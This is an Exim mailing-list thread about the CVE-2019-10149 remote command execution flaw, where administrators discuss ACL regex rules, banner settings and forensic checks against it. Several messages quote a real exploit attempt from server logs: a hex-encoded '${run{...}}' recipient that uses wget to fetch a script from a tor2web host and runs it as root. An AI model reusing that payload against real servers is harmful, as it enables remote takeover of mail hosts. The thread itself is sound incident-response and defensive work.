Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-05 Thread Jeremy Harris via Exim-users
On 04/07/2019 21:23, Ian Zimmerman via Exim-users wrote:
> After your important discovery that escaping is done on local parts as
> part of SMTP (at least that's how I interpreted the disappearance of the
> backslash from "it\z"), the next question should be but has not yet
> been:  why is this needed at all?

Because Exim's string-escaping lets you write a dollar-sign as \x24.
So we need to get a matcher for that into the RE.

>  Won't the whole escape sequence be
> transformed into a dollar sign by the time it is matched against the
> rule?

No; the SMTP string-escaping does not provide that facility.
So an attacker can fairly simply get something into a local-part
which ends up as a \x24 after the SMTP de-escaping.

-- 
Cheers,
  Jeremy

-- 
## List details at https://lists.exim.org/mailman/listinfo/exim-users
## Exim details at http://www.exim.org/
## Please use the Wiki with this list - http://wiki.exim.org/


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-05 Thread Cyborg via Exim-users
On 05.07.19 at 06:26, Jasen Betts via Exim-users wrote:
>
> It looks to me like it matches any string, it should probably be ^.*\$
> which would match any string containing a literal '$'
It's a crude, brutal protection rule against a root exploit, of course
it shall block *any* $ in that string :)

>> ^.\\x24 does the same?
> matches containing literal '\x24'
>
>> but I'm stymied about the \\0.44 notation, what's that?
> assuming typo: \\0?44 matches strings containing literal '\044' and '\44'
>

octal version of \x24 aka $ .


Guys, the rules are made to even protect against "new" "inventive" forms
of encoding attacks for a handful of servers not capable of updating,
taking into account that some non-harmful strings are also matched.

They are not meant for upgraded production servers, as they are not
needed there.

The motto is "better safe than sorry".

If you want to make the rules better, easier, smarter, please do so, but
you are wasting time and resources you should use to upgrade your
installations.

best regards,
Marius


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-04 Thread Jasen Betts via Exim-users
On 2019-07-03, Marc Haber via Exim-users  wrote:
> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
> wrote:
>>  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
>>message = no mate
>
> This might be a really stupid question, but what exactly does that do?
>
> ^.*$ blocks local_parts containing a $

It looks to me like it matches any string, it should probably be ^.*\$
which would match any string containing a literal '$'

> ^.\\x24 does the same?

matches containing literal '\x24'

> but I'm stymied about the \\0.44 notation, what's that?

assuming typo: \\0?44 matches strings containing literal '\044' and '\44'

-- 
  When I tried casting out nines I made a hash of it.



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-04 Thread Ian Zimmerman via Exim-users
On 2019-07-03 21:42, Jeremy Harris wrote:

> > \\x24 should match the literal \x24, which may be used to encode the
> > dollar sign for the unintended local_part expansion in the vulnerable
> > code.

After your important discovery that escaping is done on local parts as
part of SMTP (at least that's how I interpreted the disappearance of the
backslash from "it\z"), the next question should be but has not yet
been:  why is this needed at all?  Won't the whole escape sequence be
transformed into a dollar sign by the time it is matched against the
rule?

-- 
Please don't Cc: me privately on mailing lists and Usenet,
if you also post the followup to the list or newsgroup.
To reply privately _only_ on Usenet and on broken lists
which rewrite From, fetch the TXT record for no-use.mooo.com.



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Jeremy Harris via Exim-users
On 03/07/2019 20:02, Heiko Schlittermann via Exim-users wrote:
> Marc Haber via Exim-users  (Wed 03 Jul 2019 18:17:24 CEST):
>> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
>>  wrote:
>>>  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
>>>message = no mate
>>
>> This might be a really stupid question, but what exactly does that do?
>>
>> ^.*$ blocks local_parts containing a $
>> ^.\\x24 does the same?
>> but I'm stymied about the \\0.44 notation, what's that?
> 
> From my POV ^.*$ matches *any* local_part, as $ is the string's end anchor, 
> isn't it?
> But I can't imagine that such mistake happens to Jeremy, so I assume, I'm 
> missing the point here.

You're not missing the point at all; I made a foolish error.
That should have been   ^.*\$   - to get any local_part containing
a dollar.

> \\x24 should match the literal \x24, which may be used to encode the
> dollar sign for the unintended local_part expansion in the vulnerable
> code.
> 
> \\044 and \\44 may encode the dollar sign in base8 notation, with and
> w/o the leading zero. Both are collapsed into \\0?44

Yes.  But (MH) note there is a question-mark there, not a period.

-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Heiko Schlittermann via Exim-users
Marc Haber via Exim-users  (Wed 03 Jul 2019 18:17:24 CEST):
> On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
>  wrote:
> >  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
> >message = no mate
>
> This might be a really stupid question, but what exactly does that do?
>
> ^.*$ blocks local_parts containing a $
> ^.\\x24 does the same?
> but I'm stymied about the \\0.44 notation, what's that?

From my POV ^.*$ matches *any* local_part, as $ is the string's end anchor, 
isn't it?
But I can't imagine that such mistake happens to Jeremy, so I assume, I'm 
missing the point here.

\\x24 should match the literal \x24, which may be used to encode the
dollar sign for the unintended local_part expansion in the vulnerable
code.

\\044 and \\44 may encode the dollar sign in base8 notation, with and
w/o the leading zero. Both are collapsed into \\0?44

But I may be totally wrong here.

--
Heiko




Re: [exim] CVE-2019-10149: already vulnerable ?

2019-07-03 Thread Marc Haber via Exim-users
On Sun, 23 Jun 2019 20:02:33 +0100, Jeremy Harris via Exim-users
 wrote:
>  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
>message = no mate

This might be a really stupid question, but what exactly does that do?

^.*$ blocks local_parts containing a $
^.\\x24 does the same?
but I'm stymied about the \\0.44 notation, what's that?

Greetings
Marc
-- 
-- !! No courtesy copies, please !! -
Marc Haber |   " Questions are the | Mailadresse im Header
Mannheim, Germany  | Beginning of Wisdom " | 
Nordisch by Nature | Lt. Worf, TNG "Rightful Heir" | Fon: *49 621 72739834



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 25/06/2019 19:01, mixed8e--- via Exim-users wrote:
>> and i was not sure if EXIM does publish that string in any other possible
>> remote "access vector" too.
> 
> That would be nice to know.

A scan over the source gives me:

- logged at daemon startup & shutdown
- written to the process log on SIGUSR1
- included in debug, "-bP config" & "-bV" output
- the default Received: header text
- the default banner text

Only the last two are remotely accessible; all are locally accessible.

-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Calum Mackay via Exim-users

inline…

On 24/06/2019 7:18 pm, mixed8e--- via Exim-users wrote:
> On Fri, 2019-06-21 at 15:53 +0200, Heiko Schlittermann via Exim-users
> wrote:
>> Check your system for unusual activities.
>> Symptoms on a hacked system I became aware of were quite similar. The
>> log reported about too many received headers:
>>
>> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
>> 2019-06-20 15:13:33 Received from <> H=(.de)
>> [89.248.171.57] P=smtp S=1114
>> 2019-06-20 15:13:33 routing failed for
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
>> k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
>> x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
>> 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de: Too many "Received" headers - suspected mail loop
>> *** Frozen (delivery error message)
>
> Checked my mail server today as well and found 46 frozen mails and
> plenty of the same log messages. All of the mails were sent from a
> single IP: 89.248.171.57 (scanner20.openportstats.com) and apparently
> are sent every 3 hours.
>
> As far as I can tell nothing was changed on the server though. Files
> are fine, cron entries are standard and no cryptominer is running (CPU
> utilization is low).
>
> I got to see this on a server where the attack was successful. The code
> executed by the wget in the ${run...} command downloaded this script:
>
> https://pastebin.com/c3LKPEDU
>
> It tries to maintain infection by inserting several cron changes and copying
> itself in several places around the file system.
>
> On another machine it looks like I saw a different attack, but I don't
> know enough about Exim.  There are a large number of files in /root (Exim
> is being run as root on this server) that have names like:
>
> 86NoHEg
> DBaH23d
> f8fam2O
> Cg8E4NM
>
> Those files are all binary, but the dates on them confuse me: there are a
> group from June 15, June 16, then there is a group from May 20 which is
> before the exploit was announced.

It doesn't look related to the attack I saw.

but check the inode change time (ctime), with e.g. "ls -lc". In the
attack I saw, there were various faked mtimes, including old ones, but
the ctimes were the day of the attack.

cheers,
calum.

> Perhaps this is unrelated? There are no
> cron job entries that try to execute these files. I'm not sure what to
> make of them.
>
> Help?





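Calum's ctime check above, turned into something that can be run over a whole directory rather than read off "ls -lc" by eye. This is an added example written for this page, not code from the thread or from Exim: it flags regular files whose inode change time is much newer than their modification time, which is what a backdated mtime looks like, since mtime can be set freely (touch -d, utime) while ctime is only ever written by the kernel. The demonstration directory is constructed; the 2019-05-20 date and the file name 86NoHEg are taken from the thread. It assumes a POSIX filesystem that reports ctime (Linux, BSD, macOS).

```python
import os
import stat
import tempfile
import time


def suspicious_timestamps(root: str, min_gap_seconds: float = 86400.0):
    """Walk `root` and return (path, mtime, ctime) for every regular file
    whose ctime is more than `min_gap_seconds` newer than its mtime.
    A fresh ctime under an old mtime means the inode was changed (content
    written, mode/owner changed, or utime() called) long after the date the
    file claims to carry.  Symlinks are not followed."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_ctime - st.st_mtime > min_gap_seconds:
                hits.append((path, st.st_mtime, st.st_ctime))
    return sorted(hits)


def demo_backdated_file():
    """Constructed scenario: two dropped binaries, one with its mtime set
    back to 2019-05-20 the way the files in /root looked.  Returns the base
    names the check flags."""
    with tempfile.TemporaryDirectory() as d:
        honest = os.path.join(d, "honest")
        faked = os.path.join(d, "86NoHEg")
        for path in (honest, faked):
            with open(path, "wb") as f:
                f.write(b"\x7fELF")           # looks like a binary; content irrelevant
        backdated = time.mktime((2019, 5, 20, 0, 0, 0, 0, 0, -1))
        os.utime(faked, (backdated, backdated))   # atime/mtime go back; ctime is now
        flagged = suspicious_timestamps(d)
        return [os.path.basename(p) for p, _m, _c in flagged]


if __name__ == "__main__":
    print("flagged:", demo_backdated_file())
    # Real use on the box in question: suspicious_timestamps("/root")
```

The gap threshold is a day by default so that ordinary package installs (where ctime and mtime differ by seconds) stay quiet; an attacker who also resets ctime would need to change the system clock or write the inode from a raw device, which is a much noisier operation than touch -d.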


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Heiko Schlittermann via Exim-users
Niels Dettenbach via Exim-users  (Tue 25 Jun 2019 14:48:20 CEST):
> On Tuesday, 25 June 2019, 13:53:26 CEST, Jeremy Harris via Exim-users wrote:
> > No recompile needed.  smtp_banner.
> This only sets the banner, but not the SMTP headers " by " which are
> "public" too and used as an indicator for "security researchers" (by my
> experience) - i.e. Germany's BSI.

Starting with the next version (4.93) we have "exim_version" main
option.

exim_version    Use: main    Type: string    Default: current version

This option allows overriding the $version_number/$exim_version Exim reports
in various places. Use with care, this may fool stupid security scanners.


Best regards from Dresden/Germany
Kind regards from Dresden
Heiko Schlittermann
--
 SCHLITTERMANN.de  internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -




Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Niels Dettenbach via Exim-users
On Tuesday, 25 June 2019, 15:03:02 CEST, Jeremy Harris via Exim-users wrote:
> Indeed; but only the banner was being asked about.
ok, sorry for the noise. for me, the Recvd header is a kind of "banner" 
too. seems a misunderstanding from my side.

> You're interested in received_header_text, I suspect.
possible too - but easy to "break" any less known RFCs or "expected 
practices" without a proven "default" and so deeper experience about that - 
and I was not sure if EXIM does publish that string in any other possible 
remote "access vector" too.
 

-- 
 ---
 Niels Dettenbach
 Syndicat IT & Internet
 http://www.syndicat.com
 PGP: https://syndicat.com/pub_key.asc
 ---
 







Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 25/06/2019 13:48, Niels Dettenbach via Exim-users wrote:
> On Tuesday, 25 June 2019, 13:53:26 CEST, Jeremy Harris via Exim-users wrote:
>> No recompile needed.  smtp_banner.
> This only sets the banner, but not the SMTP headers " by " which are 
> "public" too and used as an indicator for "security researchers" (by my 
> experience) - i.e. Germany's BSI.

Indeed; but only the banner was being asked about.
You're interested in received_header_text, I suspect.

PS:  I do not need an additional copy of list emails.  I get
 very tired of getting them.  If your MUA does not have
 a "reply to list" button, please get a better one.
 I swear, I'm going to start deliberately ignoring anyone
 who sends me a useless copy, real soon now.

-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Niels Dettenbach via Exim-users
On Tuesday, 25 June 2019, 13:53:26 CEST, Jeremy Harris via Exim-users wrote:
> No recompile needed.  smtp_banner.
This only sets the banner, but not the SMTP headers " by " which are 
"public" too and used as an indicator for "security researchers" (by my 
experience) - i.e. Germany's BSI.

hth,


niels.
-- 
 ---
 Niels Dettenbach
 Syndicat IT & Internet
 http://www.syndicat.com
 PGP: https://syndicat.com/pub_key.asc
 ---
 







Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Wolfgang Breyha via Exim-users
mixed8e--- via Exim-users wrote on 24/06/2019 20:02:
> Dumb question, what is the config setting that allows me to remove the
> Exim version from the greet banner?

https://www.exim.org/exim-html-current/doc/html/spec_html/ch-main_configuration.html
search for smtp_banner

Greetings, Wolfgang
--
Wolfgang Breyha  | https://www.blafasel.at/
Vienna University Computer Center | Austria




Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 25/06/2019 12:41, Niels Dettenbach via Exim-users wrote:
> On Monday, 24 June 2019, 20:02:33 CEST, mixed8e--- via Exim-users wrote:
>> Dumb question, what is the config setting that allows me to remove the
>> Exim version from the greet banner?
> If i remember right, there is no such option in the config file

No recompile needed.  smtp_banner.

-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-25 Thread Jeremy Harris via Exim-users
On 24/06/2019 19:18, mixed8e--- via Exim-users wrote:
> a group from May 20 which is
> before the exploit was announced. Perhaps this is unrelated? There are no
> cron job entries that try to execute these files. I'm not sure what to
> make of them.

Perhaps your system was already compromised by other means.
I'd suggest a reinstall.

-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Jeremy Harris via Exim-users
On 24/06/2019 18:55, Ian Zimmerman via Exim-users wrote:
> I think this is a bug, do you agree?

Yes.  Looking into that.

-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Jeremy Harris via Exim-users
On 24/06/2019 18:55, Ian Zimmerman via Exim-users wrote:
> RCPT TO:
> 
> the local part being tested, according to the >>> output, is just "itz",
> which of course ends up being accepted.
> 
> I think this is a bug, do you agree?

This turns out to be deliberate, with the following code comment:

/* The implication in the RFCs (though I can't say I've seen it spelled out
explicitly) is that quoting should be removed from local parts at the point
where they are locally interpreted. [The new draft "821" is more explicit on
this, Jan 1999.] We know the syntax is valid, so this can be done by simply
removing quoting backslashes and any unquoted doublequotes. */

( function "deliver_split_address" )

So, to get a backslash into a local-part you have to double it in the SMTP
RCPT line:

  RCPT TO:

-- 
Cheers,
  Jeremy

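Jeremy's corrected deny rule (the list `^.*\$ : ^.*\\x24 : ^.*\\0?44` inside `\N...\N`, from his 2019-07-03 message above) and the RCPT-time quote removal he describes here interact: the ACL only ever sees the local part after deliver_split_address has stripped quoting backslashes, which is why a `\x24` needs a doubled backslash on the wire to survive. The Python below is an added example written for this page, not Exim's code and not something any poster supplied. It reimplements the quote removal exactly as the quoted code comment describes it, then runs the three patterns with Python's re module standing in for PCRE (the syntax used here behaves the same in both). The sample local parts are constructed; the Debian-style CHECK_RCPT_LOCAL_LOCALPARTS list from Calum's message further down the thread is included for comparison.

```python
import re

# Patterns exactly as PCRE receives them.  Because the Exim list sits inside
# \N...\N it is not string-expanded, so a doubled backslash in the config
# reaches PCRE as an escaped backslash, i.e. "match one literal backslash".
#
# Jeremy's rule as first posted: the unescaped "$" in "^.*$" is the
# end-of-string anchor, so the first alternative matches every local part.
POSTED_RULE = [r"^.*$", r"^.*\\x24", r"^.*\\0?44"]

# Corrected rule: "\$" is a literal dollar sign.
CORRECTED_RULE = [r"^.*\$", r"^.*\\x24", r"^.*\\0?44"]

# Debian's CHECK_RCPT_LOCAL_LOCALPARTS with "\$" added inside the class, as
# Calum ended up with.  No "+" in the class, so user+suffix stays deliverable,
# but the \x24 and \044 spellings of a dollar are not caught by it.
DEBIAN_RULE = [r"^[.]", r"^.*[\$@%!/|`#&?]"]


def smtp_dequote_local_part(wire: str) -> str:
    """Apply the quote removal described in the deliver_split_address comment:
    drop quoting backslashes (keeping the character they quote) and drop any
    double quote that is not itself backslash-quoted.  `wire` is the local
    part as it appeared on the RCPT TO: line."""
    out = []
    i = 0
    while i < len(wire):
        c = wire[i]
        if c == "\\" and i + 1 < len(wire):
            out.append(wire[i + 1])      # "\z" -> "z", "\\" -> "\", '\"' -> '"'
            i += 2
        elif c == '"':
            i += 1                       # unquoted double quote vanishes
        else:
            out.append(c)
            i += 1
    return "".join(out)


def local_part_denied(wire: str, rule=CORRECTED_RULE) -> bool:
    """True if a local_parts condition carrying `rule` would match the local
    part that the ACL sees for a RCPT TO: whose local part is `wire`."""
    seen = smtp_dequote_local_part(wire)
    return any(re.search(pattern, seen) for pattern in rule)


if __name__ == "__main__":
    # Constructed RCPT TO: local parts; each Python literal is the wire form.
    samples = [
        "itz",                        # plain
        "it\\z",                      # Ian's test: backslash is eaten, ACL sees "itz"
        "it\\\\z",                    # doubled backslash: ACL sees "it\z"
        "root+${run{true}}",          # literal dollar, the exploit shape
        "root+\\\\x24{run{true}}",    # ACL sees "\x24": Jeremy's re-encoding case
        "root+\\x24{run{true}}",      # ACL sees "x24": harmless
        "user+\\\\044",               # ACL sees "\044": octal dollar
    ]
    for s in samples:
        print(f"{s!r:28} -> ACL sees {smtp_dequote_local_part(s)!r:24}"
              f" posted={local_part_denied(s, POSTED_RULE)!s:5}"
              f" corrected={local_part_denied(s)!s:5}"
              f" debian={local_part_denied(s, DEBIAN_RULE)}")
```

Running it shows the two things the thread worked out the hard way: the posted rule denies even "itz", and a single backslash on the wire never reaches the ACL, so only the doubled-backslash forms of \x24 and \044 are the ones worth matching.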


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Cyborg via Exim-users
On 24.06.19 at 19:55, Ian Zimmerman via Exim-users wrote:
> On 2019-06-24 17:23, Jeremy Harris wrote:
> For instance, if I say this in the -bh dialog:
>
> RCPT TO:
>
> the local part being tested, according to the >>> output, is just "itz",
> which of course ends up being accepted.
>
> I think this is a bug, do you agree?
>
try a real escape sequence like \x instead, as \z is not a valid escape
sequence. Exim may remove those as "bugs in your regex" before
processing it.

best regards,
Marius





Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-24 Thread Ian Zimmerman via Exim-users
On 2019-06-24 17:23, Jeremy Harris wrote:

> > I just want to prohibit any backslashes in local parts.  I know this is
> > totally safe to do in my case.  So what is the appropriate number of
> > backslashes to put in the regexp?  Will this work:
> > 
> > deny message = Restricted characters in address
> >  domains = +local_domains
> >  local_parts = ^[.] : ^.*[\$@%!/\\|]
> 
> I suggest quoting the entire list with \N for sanity.
> Having done that I think you need a double backslash.  I did when I
> tested it.  I suggest you test it yourself, using -bh.

So I tried that.  Unfortunately, it seems that some part of Exim eats
the backslashes before they are seen by the ACL.  I don't know if this
happens only in -bh mode or if it would happen with a running daemon
too.  I'm not trying the latter ATM.

For instance, if I say this in the -bh dialog:

RCPT TO:

the local part being tested, according to the >>> output, is just "itz",
which of course ends up being accepted.

I think this is a bug, do you agree?

-- 
Please don't Cc: me privately on mailing lists and Usenet,
if you also post the followup to the list or newsgroup.
To reply privately _only_ on Usenet and on broken lists
which rewrite From, fetch the TXT record for no-use.mooo.com.



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Calum Mackay via Exim-users
Best I have so far is adding '$' to the trailing case in the Debian 
default list of bad chars in local parts of local addresses:


CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$

which gets used here:

  deny
domains = +local_domains
local_parts = CHECK_RCPT_LOCAL_LOCALPARTS
message = restricted characters in address


I had to use '\\\$', rather than adding '$' to the existing [] block, 
due to both string expansion and '$' having a special meaning to PCRE.



that seems to work, at least.


This won't affect sender addresses with the exploit attempt, but those 
will just get delivered (assuming the recipient is good, with no frozen 
queue msgs).


And it won't help for relaying attempts (where a '$' might in theory be 
valid), but my server should stop those before they get to the queue.


Of course, this also required the patched exim to ensure the exploit 
doesn't actually work (with the sender address).



comments?

cheers,
calum.


On 23/06/2019 6:51 pm, Calum Mackay via Exim-users wrote:
> On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:
>> CVE-2019-10149 is not that it is possible to submit a mail that ends
>> up frozen in the queue. CVE is a remote command execution
>> vulnerability. The fix for CVE-2019-10149 does not remove the
>> possibility to generate frozen mails in the queue, it stops the remote
>> command execution.
>
> by any chance, please, would anyone happen to have an acl_smtp_rcpt
> example that catches these particular exploit attempts — so my queue
> doesn't fill up with these frozen msgs — /but/ still allows me to have
> "user+suffix@domain" which I enable via local_part_suffix on a redirect
> router?
>
> i.e. just rejecting '+' in the local part is too strict, here.
>
> thanks very much indeed.
>
> cheers,
> calum.





Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Evgeniy Berdnikov via Exim-users
On Sun, Jun 23, 2019 at 07:37:37PM +0200, Heiko Schlittermann via Exim-users 
wrote:
> It *seems* that the attackers test for the Exim version in the SMTP
> banner. In servers having 4.92 I do not see as many attempts as on
> 4.87->4.91. But there may be other things influencing this.

 I have 4 external relays for my company with custom greeting message
 which has no word "Exim" and no version. No breaking attempts logged
 up to 16.06.2019, since this date logs have records about probes
 with prefix "root+": .
-- 
 Eugene Berdnikov



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Calum Mackay via Exim-users

or, indeed just \$ within the []:

CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[\$@%!/|`#&?]

and I've belatedly noticed that this has already been posted by Marius, 
sorry!


Apologies for the noise.

cheers,
calum.

On 23/06/2019 7:57 pm, Calum Mackay wrote:
> Best I have so far is adding '$' to the trailing case in the Debian
> default list of bad chars in local parts of local addresses:
>
> CHECK_RCPT_LOCAL_LOCALPARTS = ^[.] : ^.*[@%!/|`#&?] : ^.*\\\$
>
> which gets used here:
>
>   deny
>     domains = +local_domains
>     local_parts = CHECK_RCPT_LOCAL_LOCALPARTS
>     message = restricted characters in address
>
> I had to use '\\\$', rather than adding '$' to the existing [] block,
> due to both string expansion and '$' having a special meaning to PCRE.
>
> that seems to work, at least.
>
> This won't affect sender addresses with the exploit attempt, but those
> will just get delivered (assuming the recipient is good, with no frozen
> queue msgs).
>
> And it won't help for relaying attempts (where a '$' might in theory be
> valid), but my server should stop those before they get to the queue.
>
> Of course, this also required the patched exim to ensure the exploit
> doesn't actually work (with the sender address).
>
> comments?
>
> cheers,
> calum.
>
> On 23/06/2019 6:51 pm, Calum Mackay via Exim-users wrote:
>> On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:
>>> CVE-2019-10149 is not that it is possible to submit a mail that ends
>>> up frozen in the queue. CVE is a remote command execution
>>> vulnerability. The fix for CVE-2019-10149 does not remove the
>>> possibility to generate frozen mails in the queue, it stops the remote
>>> command execution.
>>
>> by any chance, please, would anyone happen to have an acl_smtp_rcpt
>> example that catches these particular exploit attempts — so my queue
>> doesn't fill up with these frozen msgs — /but/ still allows me to have
>> "user+suffix@domain" which I enable via local_part_suffix on a
>> redirect router?
>>
>> i.e. just rejecting '+' in the local part is too strict, here.
>>
>> thanks very much indeed.
>>
>> cheers,
>> calum.





Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Jeremy Harris via Exim-users
On 23/06/2019 18:51, Calum Mackay via Exim-users wrote:
> by any chance, please, would anyone happen to have an acl_smtp_rcpt
> example that catches these particular exploit attempts — so my queue
> doesn't fill up with these frozen msgs — /but/ still allows me to have
> "user+suffix@domain" which I enable via local_part_suffix on a redirect
> router?

  deny  local_parts = \N ^.*$ : ^.*\\x24 : ^.*\\0?44 \N
message = no mate

This is perhaps over-broad - a dollar sign in a local-part
is strictly legitimate per the standards.  However, it's
not something most strictly-Ascii sites would be wanting to
use, I suspect.
-- 
Cheers,
  Jeremy



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Calum Mackay via Exim-users

On 22/06/2019 9:44 am, Andreas Metzler via Exim-users wrote:

> CVE-2019-10149 is not that it is possible to submit a mail that ends
> up frozen in the queue. CVE is a remote command execution
> vulnerability. The fix for CVE-2019-10149 does not remove the
> possibility to generate frozen mails in the queue, it stops the remote
> command execution.


by any chance, please, would anyone happen to have an acl_smtp_rcpt 
example that catches these particular exploit attempts — so my queue 
doesn't fill up with these frozen msgs — /but/ still allows me to have 
"user+suffix@domain" which I enable via local_part_suffix on a redirect 
router?


i.e. just rejecting '+' in the local part is too strict, here.


thanks very much indeed.

cheers,
calum.



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-23 Thread Heiko Schlittermann via Exim-users
Hello,

Thomas Hager via Exim-users  (Fri 21 Jun 2019 21:26:11 CEST):
> > 2019-06-20 15:13:33 Received from <> H=(.de)
> > [89.248.171.57] P=smtp S=1114
> > 2019-06-20 15:13:33 routing failed for
> > root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dchec
> > k\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\
> > x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x
> > 20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@ > sored>.de: Too many "Received" headers - suspected mail loop

As Andreas M pointed out, the logs are the same, independently of a
successful attack. (Though a wise attacker would remove the log lines.)

It *seems* that the attackers test for the Exim version in the SMTP
banner. In servers having 4.92 I do not see as many attempts as on
4.87->4.91. But there may be other things influencing this.

Best regards from Dresden/Germany
Kind regards from Dresden
Heiko Schlittermann
--
 SCHLITTERMANN.de  internet & unix support -
 Heiko Schlittermann, Dipl.-Ing. (TU) - {fon,fax}: +49.351.802998{1,3} -
 gnupg encrypted messages are welcome --- key ID: F69376CE -
 ! key id 7CBF764A and 972EAC9F are revoked since 2015-01  -




Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-22 Thread Thomas Hager via Exim-users



On June 22, 2019 10:44:43 AM GMT+02:00, Andreas Metzler via Exim-users 
 wrote:
>Hello
Hi Andreas,

>the log-files on a try to exploit CVE-2019-10149 will look exactly the
>same
>for a vulnerable and for a fixed exim.
>
>CVE-2019-10149 is not that it is possible to submit a mail that ends
>up frozen in the queue. CVE is a remote command execution
>vulnerability. The fix for CVE-2019-10149 does not remove the
>possibility to generate frozen mails in the queue, it stops the remote
>command execution.
Thanks for the clarification. I thought so, but it's way better to know ;-)

Cheers,
Tom.

-- 
Sent from my Android device with K-9 Mail. Please excuse my brevity.



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Cyborg via Exim-users
On 21.06.19 at 16:29, Benoît PELISSIER via Exim-users wrote:
>> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
>> 2019-06-20 15:13:33 Received from <> H=(.de)
>> [89.248.171.57] P=smtp S=1114
>> 2019-06-20 15:13:33 routing failed for
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de:
>> Too many "Received" headers - suspected mail loop
>> *** Frozen (delivery error message)
>
> I have this log entry too...
>

Does not look good for you to be honest.

Best regards,
Marius



Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Benoît PELISSIER via Exim-users

> The version is fine.
> But the question is, when did you install this version?

When Debian updated its repo

> Check your system for unusual activities.
> Symptoms on a hacked system I became aware of were quite similar. The log
> reported about too many received headers:
>
> root@old-mai:~# exim -Mvl 1hdwsf-0006h5-EE
> 2019-06-20 15:13:33 Received from <> H=(.de) [89.248.171.57] P=smtp 
> S=1114
> 2019-06-20 15:13:33 routing failed for 
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2fan7kmd2wp4xo7hpr\x2etor2web\x2eio\x2fsrc\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ejvgon\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ejvgon\x20\x2dn\x20\x26\x22}}@.de:
>  Too many "Received" headers - suspected mail loop
> *** Frozen (delivery error message)

I have this log entry too...

Benoît


Re: [exim] CVE-2019-10149: already vulnerable ?

2019-06-21 Thread Drav Sloan via Exim-users
Benoît PELISSIER via Exim-users wrote:
